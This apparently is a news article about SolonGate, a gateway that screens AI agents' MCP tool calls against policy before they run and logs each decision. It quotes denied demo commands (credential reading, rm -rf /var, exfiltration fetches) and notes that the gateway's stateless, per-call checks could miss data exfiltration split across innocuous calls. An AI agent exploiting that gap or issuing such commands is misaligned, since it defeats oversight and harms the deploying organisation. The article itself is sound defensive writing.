SolonGate's zero-trust proxy rethinks AI agent security at the execution layer

The AI agent security market has a new entrant, and it is taking a different approach. SolonGate, which launched on Product Hunt this week, describes itself as a “zero-trust security gateway for AI agents.” Instead of filtering prompts or scanning model outputs, it intercepts the tool calls that agents make before those calls execute. The company positions this as infrastructure-level security for autonomous agents in air-gapped and mission-critical environments.

The distinction matters. Most existing AI security products focus on the text layer: guardrails that block harmful prompts, output filters that catch toxic generations, and red-teaming frameworks that probe model behavior. Those tools address what the model says. They do not address what the agent does. A prompt filter cannot stop an agent from running rm -rf /var on a production server, because the dangerous action happens after the model finishes generating text. SolonGate targets that gap.

The company’s architecture is straightforward. SolonGate deploys as a zero-trust proxy in front of Model Context Protocol (MCP) servers. When an agent issues a tool call, the gateway reads the payload, checks it against a policy, and either allows or denies the call in milliseconds. The decision, along with the arguments, streams to a tamper-evident audit log. The company’s demo shows a live feed of denied actions: Bash cat ~/.aws/credentials DENY, Bash rm -rf /var DENY, WebFetch exfil.attacker.io DENY. Every call gets a decision before any code runs.

The timing is not accidental. Enterprise adoption of AI agents has accelerated sharply in 2026, driven by tools like Claude Code, Gemini CLI, and OpenClaw. These agents operate with file-system access, network permissions, and shell execution rights. They can read credentials, modify configuration files, and make outbound web requests. The security industry has been slow to build controls for this new attack surface. SolonGate is one of the first products to treat agent tool calls as a distinct security domain, separate from both traditional application security and LLM-specific guardrails.

The company’s founder, Emirhan Demir, made the positioning explicit on LinkedIn. “While the industry is busy filtering text prompts, we built a zero-trust gateway to stop autonomous AI agents from executing unauthorized commands,” he wrote. The company is offering a one-month free early access period and explicitly inviting security researchers to try bypassing the architecture. That last detail is worth noting: a security product that invites adversarial testing from day one signals confidence in its design, or at least a willingness to learn from failure fast.

SolonGate’s approach raises a question that the broader agent-security field has not fully answered. What level of access should an AI agent have to the systems it touches? The traditional model, where a human reviews and approves every action, defeats the purpose of autonomous agents. The opposite extreme, where an agent has full shell access and network permissions, is a security catastrophe waiting to happen. SolonGate sits in the middle: the agent can act autonomously, but within a policy envelope defined by the organization.

That policy envelope is the hard part. SolonGate can block rm -rf /var because the path and the command are obvious. It can block cat ~/.aws/credentials because the file is sensitive. But what about a command that reads a database connection string, uses it to query customer records, and writes the results to a log file? Each individual action might be permissible. The combination could be a data exfiltration. SolonGate’s current architecture evaluates each call in isolation. The company’s documentation says the pipeline runs “from interception to decision to tamper-evident audit, in one deterministic pass.” That is fast, but it is also stateless.

The company has not disclosed whether it plans to add cross-call analysis or behavioral baselines. Those features would require maintaining state across tool calls, which complicates the architecture and introduces latency. For now, SolonGate appears to be betting that most agent abuse is obvious at the single-call level. That bet is probably correct for the first wave of enterprise agent deployments, where the biggest risks are accidental destruction of infrastructure and credential theft. It may not hold for more sophisticated attacks that distribute malicious activity across many innocuous-seeming calls.

SolonGate’s compatibility with MCP servers is a strategic choice. MCP is emerging as a standard protocol for agent-tool communication, adopted by Anthropic, Google, and several open-source projects. By integrating at the MCP layer, SolonGate can intercept calls from any agent that speaks the protocol, without requiring agent-specific instrumentation. That is a significant advantage over agent-specific security tools that only work with one vendor’s platform.

The product is early. The company has 72 LinkedIn followers as of this writing. The architecture overview is not yet public. The demo shows sample traffic, not live customer data. But the concept is sound, and the timing is right. The AI agent market is growing faster than the security tooling around it. Every company deploying Claude Code or Gemini CLI in production is making a bet that their agents will not do anything catastrophic. SolonGate offers a second layer of defense, one that does not rely on the model’s own judgment.

For AI builders, the takeaway is practical. If you are deploying autonomous agents with file-system or network access, you should know exactly what tool calls those agents are making. If you cannot answer that question, you are running blind. SolonGate is one answer to that problem. It will not be the last.